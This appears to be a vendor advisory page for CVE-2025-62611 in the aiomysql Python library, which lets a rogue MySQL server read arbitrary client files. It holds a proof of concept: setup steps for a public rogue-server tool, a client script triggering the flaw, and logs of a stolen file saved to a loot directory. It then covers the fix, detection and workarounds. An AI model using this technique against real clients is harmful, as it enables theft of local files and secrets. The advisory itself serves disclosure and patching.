CVE-2025-62611 — aiomysql
Fix: aio-libs/aiomysql@32c4520CVE-2025-62611 is a CWE-73 vulnerability in aiomysql. A fix is available for aiomysql — see the affected versions and patch details below.
aiomysql allows arbitrary access to client files through vulnerability of a malicious MySQL server
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
Exploitation and automatability from CISA’s SSVC triage for CVE-2025-62611.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Real-World Exposure
aiomysqlReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The client-side settings are not checked before sending local files to MySQL server, which allows obtaining arbitrary files from the client using a rogue server.
Details
It is possible to create a rogue MySQL server that emulates authorization, ignores client flags and requests arbitrary files from the client by sending a LOAD_LOCAL instruction packet. Related to CVE-2019-2503.
PoC
First, start up a rogue MySQL server that ignores client-side flags and sends LOAD_LOCAL packet to the client – tested with https://github.com/rmb122/rogue_mysql_server
- Create a file to be stolen by the rogue server:
echo "gotcha" > /tmp/my_secret_file.txt - Clone the repo:
git clone [email protected]:rmb122/rogue_mysql_server.git && cd rogue_mysql_server - Build the server:
make rogue_mysql_server - Generate a sample config:
rogue_mysql_server -generate - In
config.yamlchangefile_listto["/tmp/my_secret_file.txt"] - Run the server:
./rogue_mysql_server -config config.yaml
Next, the vulnerability can be seen in action with the following script, which can be run in a second terminal:
import asyncio
import aiomysql
loop = asyncio.get_event_loop()
async def test_example():
conn = await aiomysql.connect(
host="127.0.0.1",
port=3306,
user="root",
password="",
db="mysql",
loop=loop,
local_infile=0, # note that we explicitly forbid local_infile
)
cursor = await conn.cursor()
await cursor.execute("SELECT 1")
print(cursor.description)
r = await cursor.fetchall()
print(r)
await cursor.close()
conn.close()
loop.run_until_complete(test_example())
The rogue server will output log messages indicating successful file read and save the contents in the loot/ directory
level=info msg="Client from addr [xxx], ID [1] try to query [select 1]"
level=info msg="Now try to read file [/tmp/my_secret_file.txt] from addr [xxx], ID [1]"
level=info msg="Read success, stored at [./loot/xxx/1757403852610__tmp_top_secret_file.txt]"
level=info msg="Client leaved, Addr [xxx], ID [1]"
Impact
This vulnerability impacts products and environments that require connection to untrusted MySQL servers or allow the possibility for them to be compromised.
Fix suggestion
Can be fixed by porting relevant changes from PyMySQL – https://github.com/PyMySQL/PyMySQL/commit/b5e17cee46e0706dbfd707cdd2024452f0fb3267
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | aiomysql | all versions | 0.3.0pip install --upgrade 'aiomysql==0.3.0' |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for aiomysql, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update aiomysql to 0.3.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-62611 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like CVE-2025-62611 can be triaged on real exposure rather than presence alone.
Tailored to CVE-2025-62611. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is CVE-2025-62611 in your dependencies?
O3 Security finds CVE-2025-62611 across PyPI dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.